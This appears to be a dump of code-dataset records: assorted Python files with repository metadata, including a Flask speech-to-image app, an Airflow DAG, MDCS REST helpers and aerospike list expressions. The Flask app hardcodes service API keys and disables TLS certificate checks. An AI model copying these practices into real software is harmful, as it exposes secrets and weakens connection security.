if head.next is None:
return point
if __name__ == "__main__":
l1 = ListNode(1)
l1.next = ListNode(2)
l1.next.next = ListNode(3)
l1.next.next.next = ListNode(4)
l1.next.next.next.next = ListNode(5)
l1.next.next.next.next.next = ListNode(6)
head = l1
res = Solution().swapPairs(head)
while res:
print(res.val)
res = res.next | 46 | 703 | 72 |
9f592c9983e58816d6a9a02264b3012dba617a05 | 1,290 | py | Python | logger.py | Anu1996rag/PythonLogging | 3231c76c680a20df27182e99ffcc116f95b5f864 | [
"MIT"
] | null | null | null | logger.py | Anu1996rag/PythonLogging | 3231c76c680a20df27182e99ffcc116f95b5f864 | [
"MIT"
] | null | null | null | logger.py | Anu1996rag/PythonLogging | 3231c76c680a20df27182e99ffcc116f95b5f864 | [
"MIT"
] | null | null | null | # this file creates new log files in the particular folders created by the
# createFolder file and generates separate log files for separate programs
import os,inspect
import logging,logging.config
from createFolder import createFolder
# logging levels
loglevel = "debug"
if loglevel.upper() == "DEBUG":
loglevels = logging.DEBUG
elif loglevel.upper() == "INFO":
loglevels = logging.DEBUG
elif loglevel.upper() == "WARNING":
loglevels = logging.WARNING
elif loglevel.upper() == "ERROR":
loglevels = logging.ERROR
elif loglevel.upper() == "CRITICAL":
loglevels = logging.CRITICAL
else:
loglevels = logging.DEBUG
| 26.326531 | 110 | 0.717054 | # this file creates new log files in the particular folders created by the
# createFolder file and generates separate log files for separate programs
import os,inspect
import logging,logging.config
from createFolder import createFolder
# logging levels
loglevel = "debug"
if loglevel.upper() == "DEBUG":
loglevels = logging.DEBUG
elif loglevel.upper() == "INFO":
loglevels = logging.DEBUG
elif loglevel.upper() == "WARNING":
loglevels = logging.WARNING
elif loglevel.upper() == "ERROR":
loglevels = logging.ERROR
elif loglevel.upper() == "CRITICAL":
loglevels = logging.CRITICAL
else:
loglevels = logging.DEBUG
def createLogFile(logfilename):
return logging.config.fileConfig(fname='loggingConfiguration.conf', defaults={'logfilename': logfilename})
def loggingInfo(loglevel=logging.DEBUG):
#creting new folder
folderPath = createFolder()
#path of the micro services file to be called
path = str(inspect.stack()[1][1]).split("/")
# file name extracted from the path
filename = path[len(path) - 1]
fileLogName = os.getcwd() + folderPath + filename + ".log"
#creating new log file
createLogFile(fileLogName)
print('log file created')
logger = logging.getLogger(fileLogName)
logger.setLevel(loglevels)
| 600 | 0 | 46 |
e0c9ffa5cddba48275d62feb92bcea844dd90204 | 2,764 | py | Python | app.py | galaxyxxxxx/audio2img | d44a34de1fb7c6bcd5dc3ba40704077a457e9c48 | [
"MIT"
] | null | null | null | app.py | galaxyxxxxx/audio2img | d44a34de1fb7c6bcd5dc3ba40704077a457e9c48 | [
"MIT"
] | null | null | null | app.py | galaxyxxxxx/audio2img | d44a34de1fb7c6bcd5dc3ba40704077a457e9c48 | [
"MIT"
] | 1 | 2021-01-27T05:47:03.000Z | 2021-01-27T05:47:03.000Z | from flask import Flask, render_template, request, jsonify,redirect, url_for
from werkzeug.utils import secure_filename
import requests
import random
import json
import os
import time
import xlrd
from flask_cors import CORS
from requests_toolbelt import MultipartEncoder
app = Flask(__name__)
#CORS(app, supports_credentials=True) #For跨域请求
#app.config['SEND_FILE_MAX_AGE_DEFAULT'] = timedelta(seconds=1) #缓存控制时长
# 语音识别api
ASR_URL = 'https://voice.lenovomm.com/lasf/asr'
# 根据语音识别内容 选择图片
@app.route('/')
@app.route('/receiveAudio', methods=['POST'])
if __name__ == '__main__':
app.run(debug=True)
| 31.05618 | 118 | 0.613965 | from flask import Flask, render_template, request, jsonify,redirect, url_for
from werkzeug.utils import secure_filename
import requests
import random
import json
import os
import time
import xlrd
from flask_cors import CORS
from requests_toolbelt import MultipartEncoder
app = Flask(__name__)
#CORS(app, supports_credentials=True) #For跨域请求
#app.config['SEND_FILE_MAX_AGE_DEFAULT'] = timedelta(seconds=1) #缓存控制时长
# 语音识别api
ASR_URL = 'https://voice.lenovomm.com/lasf/asr'
def send(ixid, pidx, over, session, voice):
files = {'voice-data': voice}
data = {
'param-data': 'cpf=windows&dtp=iO2S&ver=1.1.9&did=270931c188c281ca&uid=6922073&'
'dev=lenovo.ecs.vt&app=com.lenovo.menu_assistant&stm=1494237601458&'
'ssm=true&vdm=all&rvr=&sce=long&ntt=wifi&aue=speex-wb;7&'
'auf=audio%2FL16%3Brate%3D16000&ixid=' + str(ixid) + '&pidx=' + str(pidx) + '&over=' + str(over)
}
header = {
'lenovokey': 'LENOVO-VOICE-4a817ca65xb7fa574yf252',
'secretkey': 'BBDAB59701C1CEA201968DFB7E3DAAD7',
'channel': 'cloudasr'
}
response = session.post(ASR_URL, headers=header, data=data, files=files, verify=False, timeout=30)
print(response.text)
return response
# 根据语音识别内容 选择图片
def filter(text):
word_list=["天空","阳光","云","海","草","花","山","楼","车","路"]
result=[1 if i in text else 0 for i in word_list]
keyWords = result
book = xlrd.open_workbook("./static/image/test.xlsx")
sheet1 = book.sheet_by_index(0) # 打开索引号为0的表
scores = {}
lists = []
# 读取图片权重分值
for i in range(sheet1.nrows):
row = sheet1.row_values(i) # 逐行读取
scores[row[0]] = [row[1:11]]
# 计算加权平均数
for name in scores:
total = 0
for x in scores[name]:
for i in range(len(x)):
total += x[i]*keyWords[i]
lists.append([name,total])
# 排序
def takeSecond(elem):
return elem[1]
lists.sort(key = takeSecond, reverse = True)
tem = lists[0]
name = tem[0]
name_num = name[-2:]
name_num_int = int(name_num)
nameNum = name_num_int*10 + random.randint(0,3)
fileName = './static/image/'+'image' + str (nameNum) + '.jpg'
return fileName
@app.route('/')
def home():
return render_template('index.html')
@app.route('/receiveAudio', methods=['POST'])
def receiveAudio():
session = requests.session()
ixid = int(round(time.time() * 1000))
pidx = 1
file = request.files['file'].read()
txt = send(ixid, pidx, 1, session, file).json().get("rawText","") #识别的语音内容
imgUrl = filter(txt) #对应的图片
return imgUrl
if __name__ == '__main__':
app.run(debug=True)
| 2,160 | 0 | 89 |
758f9f954011f69548b7ff155de4e6d303ed3998 | 756 | py | Python | easy/count-primes.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | easy/count-primes.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | easy/count-primes.py | therealabdi2/LeetcodeQuestions | 4c45ee836482a2c7b59906f7a7a99b5b3fa17317 | [
"MIT"
] | null | null | null | """Count the number of prime numbers less than a non-negative number, n.
Example 1:
Input: n = 10
Output: 4
Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.
Example 2:
Input: n = 0
Output: 0
Example 3:
Input: n = 1
Output: 0"""
import math
s = Solution()
print(s.countPrimes(12))
| 19.894737 | 78 | 0.589947 | """Count the number of prime numbers less than a non-negative number, n.
Example 1:
Input: n = 10
Output: 4
Explanation: There are 4 prime numbers less than 10, they are 2, 3, 5, 7.
Example 2:
Input: n = 0
Output: 0
Example 3:
Input: n = 1
Output: 0"""
import math
class Solution:
def countPrimes(self, n: int) -> int:
if n < 2:
return 0
isPrime = [True] * n
isPrime[0] = isPrime[1] = False
for i in range(2, int(math.ceil(math.sqrt(n)))):
if isPrime[i]:
for multiples_of_i in range(i * i, n, i):
isPrime[multiples_of_i] = False
return sum(isPrime) # return the number of True elements in the array
s = Solution()
print(s.countPrimes(12))
| 399 | -6 | 49 |
1cab8e10520f9ed00a854568085670a24e8869bf | 1,041 | py | Python | train/grid_search.py | veritas9872/Knowledge-Distillation-Task | d260b1057c96cfc52af8ff7a0775befbd102f59d | [
"MIT"
] | 2 | 2020-02-16T13:30:27.000Z | 2021-01-18T14:18:26.000Z | train/grid_search.py | veritas9872/Knowledge-Distillation-Task | d260b1057c96cfc52af8ff7a0775befbd102f59d | [
"MIT"
] | null | null | null | train/grid_search.py | veritas9872/Knowledge-Distillation-Task | d260b1057c96cfc52af8ff7a0775befbd102f59d | [
"MIT"
] | null | null | null | """
Code for applying grid search to find the best parameters for knowledge distillation.
The distillation ratio and temperature parameters are being tuned in this search.
"""
import torch
from train.distill_knowledge import main
from utils.options import knowledge_distillation_options
if __name__ == '__main__':
# Reproducibility settings.
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
grid_search()
| 31.545455 | 91 | 0.673391 | """
Code for applying grid search to find the best parameters for knowledge distillation.
The distillation ratio and temperature parameters are being tuned in this search.
"""
import torch
from train.distill_knowledge import main
from utils.options import knowledge_distillation_options
def grid_search():
options = dict(
train_method='Search'
)
temperatures = [1, 2, 4, 8, 16, 32, 64]
distill_ratios = [1., 0.99, 0.95, 0.9, 0.75, 0.5, 0.25, 0.1, 0.05, 0.01, 0.]
for temp in temperatures:
for dist in distill_ratios:
options['temperature'] = temp
options['distill_ratio'] = dist
opt = knowledge_distillation_options(**options).parse_args()
# Reproducibility settings. Seeding must be repeated at the start of every run.
torch.random.manual_seed(9872)
main(opt)
if __name__ == '__main__':
# Reproducibility settings.
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
grid_search()
| 561 | 0 | 23 |
6ee110a8e3ab8f33b2314a11563292fe766bc8bb | 1,121 | py | Python | psst.py | Thomas-Hirsch/airflow-dags | 37b1e9a44dbfd508c1f6b86c712d699bfdff4ca2 | [
"Apache-2.0"
] | null | null | null | psst.py | Thomas-Hirsch/airflow-dags | 37b1e9a44dbfd508c1f6b86c712d699bfdff4ca2 | [
"Apache-2.0"
] | null | null | null | psst.py | Thomas-Hirsch/airflow-dags | 37b1e9a44dbfd508c1f6b86c712d699bfdff4ca2 | [
"Apache-2.0"
] | null | null | null | from datetime import datetime, timedelta
import airflow
from airflow import DAG
from airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator
from airflow.utils.dates import days_ago
# GLOBAL ENV VARIABLES
IMAGE_VERSION = "v1.0.0"
IMAGE = f"593291632749.dkr.ecr.eu-west-1.amazonaws.com/airflow-psst-data:{IMAGE_VERSION}"
ROLE = "airflow_psst_data"
# Task arguments
task_args = {
"depends_on_past": False,
"email_on_failure": True,
"owner": "samtazzyman",
"email": ["samuel.tazzyman@digital.justice.gov.uk"],
}
# DAG defined
dag = DAG(
"psst_data",
default_args=task_args,
description="get new prison reports, process them, and put them in the psst",
start_date=datetime(2019, 2, 21),
schedule_interval="@daily",
catchup=False,
)
task_id = "psst-data"
task1 = KubernetesPodOperator(
dag=dag,
namespace="airflow",
image=IMAGE,
env_vars={
},
labels={"app": dag.dag_id},
name=task_id,
in_cluster=True,
task_id=task_id,
get_logs=True,
startup_timeout_seconds=500,
annotations={"iam.amazonaws.com/role": ROLE},
) | 24.911111 | 89 | 0.711864 | from datetime import datetime, timedelta
import airflow
from airflow import DAG
from airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator
from airflow.utils.dates import days_ago
# GLOBAL ENV VARIABLES
IMAGE_VERSION = "v1.0.0"
IMAGE = f"593291632749.dkr.ecr.eu-west-1.amazonaws.com/airflow-psst-data:{IMAGE_VERSION}"
ROLE = "airflow_psst_data"
# Task arguments
task_args = {
"depends_on_past": False,
"email_on_failure": True,
"owner": "samtazzyman",
"email": ["samuel.tazzyman@digital.justice.gov.uk"],
}
# DAG defined
dag = DAG(
"psst_data",
default_args=task_args,
description="get new prison reports, process them, and put them in the psst",
start_date=datetime(2019, 2, 21),
schedule_interval="@daily",
catchup=False,
)
task_id = "psst-data"
task1 = KubernetesPodOperator(
dag=dag,
namespace="airflow",
image=IMAGE,
env_vars={
},
labels={"app": dag.dag_id},
name=task_id,
in_cluster=True,
task_id=task_id,
get_logs=True,
startup_timeout_seconds=500,
annotations={"iam.amazonaws.com/role": ROLE},
) | 0 | 0 | 0 |
dd078f8b597fc5457e2c4a5dbf2b958195904e31 | 661 | py | Python | boofuzz/boofuzz/connections/ip_constants.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:01.000Z | 2021-06-04T14:27:15.000Z | boofuzz/boofuzz/connections/ip_constants.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | null | null | null | boofuzz/boofuzz/connections/ip_constants.py | mrTavas/owasp-fstm-auto | 6e9ff36e46d885701c7419db3eca15f12063a7f3 | [
"CC0-1.0"
] | 2 | 2021-05-05T12:03:09.000Z | 2021-06-04T14:27:21.000Z | """
This file contains constants for the IPv4 protocol.
.. versionchanged:: 0.2.0
ip_constants has been moved into the connections subpackage.
The full path is now boofuzz.connections.ip_constants
"""
IPV4_PROTOCOL_UDP = 0x11
#: Theoretical maximum length of a UDP packet, based on constraints in the UDP
#: packet format.
#: WARNING! a UDP packet cannot actually be this long in the context of IPv4!
UDP_MAX_LENGTH_THEORETICAL = 65535
#: Theoretical maximum length of a UDP payload based on constraints in the
#: UDP and IPv4 packet formats.
#: WARNING! Some systems may set a payload limit smaller than this.
UDP_MAX_PAYLOAD_IPV4_THEORETICAL = 65507
| 38.882353 | 78 | 0.779123 | """
This file contains constants for the IPv4 protocol.
.. versionchanged:: 0.2.0
ip_constants has been moved into the connections subpackage.
The full path is now boofuzz.connections.ip_constants
"""
IPV4_PROTOCOL_UDP = 0x11
#: Theoretical maximum length of a UDP packet, based on constraints in the UDP
#: packet format.
#: WARNING! a UDP packet cannot actually be this long in the context of IPv4!
UDP_MAX_LENGTH_THEORETICAL = 65535
#: Theoretical maximum length of a UDP payload based on constraints in the
#: UDP and IPv4 packet formats.
#: WARNING! Some systems may set a payload limit smaller than this.
UDP_MAX_PAYLOAD_IPV4_THEORETICAL = 65507
| 0 | 0 | 0 |
31e33b4f971db68d33d49ba1581c6e72c9b06d43 | 4,183 | py | Python | mdcs/explore.py | knc6/MDCS-api-tools | eb51a1124e3daf2c4c1e968395f66e85c22b92f9 | [
"CC0-1.0"
] | null | null | null | mdcs/explore.py | knc6/MDCS-api-tools | eb51a1124e3daf2c4c1e968395f66e85c22b92f9 | [
"CC0-1.0"
] | null | null | null | mdcs/explore.py | knc6/MDCS-api-tools | eb51a1124e3daf2c4c1e968395f66e85c22b92f9 | [
"CC0-1.0"
] | null | null | null | #! /usr/bin/env python
import requests
from collections import OrderedDict
from utils import check_response
def select_all(host,user,pswd,cert=None,format=None):
"""Get all data from the MDCS server
Inputs:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
Output:
lists where each entry is a dictionary describing entries that match the query.
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/select/all"
params = dict()
if format: params['dataformat'] = format
r = requests.get(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def select(host,user,pswd,cert=None,format=None,ID=None,template=None,title=None):
"""Get all data that fits a certain simple query
Inputs:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
template - string, ID of the schema for particular data
ID - string, ID of entry to be retrieved
title - string, title of data to be retrieved
Output:
list of all entries in the database
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/select"
params = dict()
if format: params['dataformat'] = format
if ID: params['id'] = ID
if template: params['schema'] = template
if title: params['title'] = title
r = requests.get(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def delete(ID,host,user,pswd,cert=None):
"""Delete an entry
Input:
ID - string, ID of object to be deleted
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
Output:
response from MDCS
"""
url = host.strip("/") + "/rest/explore/delete"
params = dict()
params['id']=ID
r = requests.delete(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def query(host,user,pswd,cert=None,format=None,query=None,repositories=None):
"""Query by example.
Input:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
respositories - string, lists of names of other repositories to be
Output:
lists where each entry is a dictionary describing entries that match the query.
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/query-by-example"
data = dict()
if format: data['dataformat'] = format
if query: data['query'] = query
if repositories: data['repositories'] = repositories
r = requests.post(url, data=data, auth=(user, pswd), verify=cert)
return check_response(r) | 41.415842 | 87 | 0.643318 | #! /usr/bin/env python
import requests
from collections import OrderedDict
from utils import check_response
def select_all(host,user,pswd,cert=None,format=None):
"""Get all data from the MDCS server
Inputs:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
Output:
lists where each entry is a dictionary describing entries that match the query.
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/select/all"
params = dict()
if format: params['dataformat'] = format
r = requests.get(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def select(host,user,pswd,cert=None,format=None,ID=None,template=None,title=None):
"""Get all data that fits a certain simple query
Inputs:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
template - string, ID of the schema for particular data
ID - string, ID of entry to be retrieved
title - string, title of data to be retrieved
Output:
list of all entries in the database
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/select"
params = dict()
if format: params['dataformat'] = format
if ID: params['id'] = ID
if template: params['schema'] = template
if title: params['title'] = title
r = requests.get(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def delete(ID,host,user,pswd,cert=None):
"""Delete an entry
Input:
ID - string, ID of object to be deleted
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
Output:
response from MDCS
"""
url = host.strip("/") + "/rest/explore/delete"
params = dict()
params['id']=ID
r = requests.delete(url, params=params, auth=(user, pswd), verify=cert)
return check_response(r)
def query(host,user,pswd,cert=None,format=None,query=None,repositories=None):
"""Query by example.
Input:
host - string, URL of MDCS instance
user - string, username of desired account on MDCS server
pswd - string, password of desired account on MDCS server
cert - string, path to authentication certificate
format - string, format of data (can be xml or json)
respositories - string, lists of names of other repositories to be
Output:
lists where each entry is a dictionary describing entries that match the query.
dictionaries each have the keys:
title - title of the entry
schema - ID of the schema that describes the entry
content - content of the entry in either xml or json format
_id - ID number of the entry
"""
url = host.strip("/") + "/rest/explore/query-by-example"
data = dict()
if format: data['dataformat'] = format
if query: data['query'] = query
if repositories: data['repositories'] = repositories
r = requests.post(url, data=data, auth=(user, pswd), verify=cert)
return check_response(r) | 0 | 0 | 0 |
d3e0669a72fd4a4883dec6a69028023f6abf7602 | 45,858 | py | Python | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | ##########################################################################
# Copyright 2013-2021 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
List expressions contain expressions for reading and modifying Lists. Most of
these operations are from the standard :mod:`List API <aerospike_helpers.operations.list_operations>`.
Example::
import aerospike_helpers.expressions as exp
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
'''
from __future__ import annotations
from itertools import chain
from typing import List, Optional, Tuple, Union, Dict, Any
import aerospike
from aerospike_helpers import cdt_ctx
from aerospike_helpers.expressions.resources import _GenericExpr
from aerospike_helpers.expressions.resources import _BaseExpr
from aerospike_helpers.expressions.resources import _ExprOp
from aerospike_helpers.expressions.resources import ResultType
from aerospike_helpers.expressions.resources import _Keys
from aerospike_helpers.expressions.base import ListBin
######################
# List Mod Expressions
######################
TypeBinName = Union[_BaseExpr, str]
TypeListValue = Union[_BaseExpr, List[Any]]
TypeIndex = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCTX = Union[None, List[cdt_ctx._cdt_ctx]]
TypeRank = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCount = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeValue = Union[_BaseExpr, Any]
TypePolicy = Union[Dict[str, Any], None]
class ListAppend(_BaseExpr):
    """Create an expression that appends a single value to the end of a list."""
    _op = aerospike.OP_LIST_APPEND

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            value (TypeValue): Value or value expression to append to the list.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: List expression.
            Example::
                # Check if length of list bin "a" is > 5 after appending 1 item.
                expr = exp.GT(
                    exp.ListSize(None, exp.ListAppend(None, None, 3, exp.ListBin("a"))),
                    5).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        # The CRMOD sub-expression carries the list policy when one is supplied.
        crmod = _GenericExpr(
            _ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD,
            0,
            {} if policy is None else {_Keys.LIST_POLICY_KEY: policy},
        )
        self._children = (value, crmod, target)
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListAppendItems(_BaseExpr):
    """Create an expression that appends a list of items to the end of a list."""
    _op = aerospike.OP_LIST_APPEND_ITEMS

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            value (TypeValue): List or list expression of items to append.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: List expression.
            Example::
                # Check if length of list bin "a" is > 5 after appending multiple items.
                expr = exp.GT(
                    exp.ListSize(None, exp.ListAppendItems(None, None, [3, 2], exp.ListBin("a"))),
                    5).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        # The CRMOD sub-expression carries the list policy when one is supplied.
        crmod = _GenericExpr(
            _ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD,
            0,
            {} if policy is None else {_Keys.LIST_POLICY_KEY: policy},
        )
        self._children = (value, crmod, target)
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListInsert(_BaseExpr):
    """Create an expression that inserts a value at the specified index of a list."""
    _op = aerospike.OP_LIST_INSERT

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            index (TypeIndex): Target index for insertion, integer or integer expression.
            value (TypeValue): Value or value expression to insert.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: List expression.
            Example::
                # Check if list bin "a" has length > 5 after insert.
                expr = exp.GT(
                    exp.ListSize(None, exp.ListInsert(None, None, 0, 3, exp.ListBin("a"))),
                    5).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        # The MOD sub-expression carries the list policy when one is supplied.
        mod = _GenericExpr(
            _ExprOp._AS_EXP_CODE_CDT_LIST_MOD,
            0,
            {} if policy is None else {_Keys.LIST_POLICY_KEY: policy},
        )
        self._children = (index, value, mod, target)
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListInsertItems(_BaseExpr):
    """Create an expression that inserts each input list item starting at the specified index of a list."""
    _op = aerospike.OP_LIST_INSERT_ITEMS

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, values: TypeListValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            index (TypeIndex): Target index where item insertion begins, integer or integer expression.
            values (TypeListValue): List or list expression of items to insert.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: List expression.
            Example::
                # Check if list bin "a" has length > 5 after inserting items.
                expr = exp.GT(
                    exp.ListSize(None, exp.ListInsertItems(None, None, 0, [4, 7], exp.ListBin("a"))),
                    5).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        # The MOD sub-expression carries the list policy when one is supplied.
        mod = _GenericExpr(
            _ExprOp._AS_EXP_CODE_CDT_LIST_MOD,
            0,
            {} if policy is None else {_Keys.LIST_POLICY_KEY: policy},
        )
        self._children = (index, values, mod, target)
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListIncrement(_BaseExpr):
    """Create an expression that increments list[index] by value."""
    _op = aerospike.OP_LIST_INCREMENT

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            index (TypeIndex): Index of the value to increment.
            value (TypeValue): Value or value expression to increment by.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: List expression.
            Example::
                # Check if incremented value in list bin "a" is the largest in the list.
                expr = exp.Eq(
                    exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, -1, #rank of -1 == largest element.
                        exp.ListIncrement(None, None, 1, 5, exp.ListBin("a"))),
                    exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 1,
                        exp.ListIncrement(None, None, 1, 5, exp.ListBin("a")))
                ).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        # The CRMOD sub-expression carries the list policy when one is supplied.
        crmod = _GenericExpr(
            _ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD,
            0,
            {} if policy is None else {_Keys.LIST_POLICY_KEY: policy},
        )
        self._children = (index, value, crmod, target)
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListSet(_BaseExpr):
    """Create an expression that sets the item value at the specified index in a list."""
    _op = aerospike.OP_LIST_SET

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            index (TypeIndex): Index of the value to set.
            value (TypeValue): Value or value expression to set the list element to.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: List expression.
            Example::
                # Get smallest element in list bin "a" after setting index 1 to 10.
                expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0,
                        exp.ListSet(None, None, 1, 10, exp.ListBin("a"))).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        # The MOD sub-expression carries the list policy when one is supplied.
        mod = _GenericExpr(
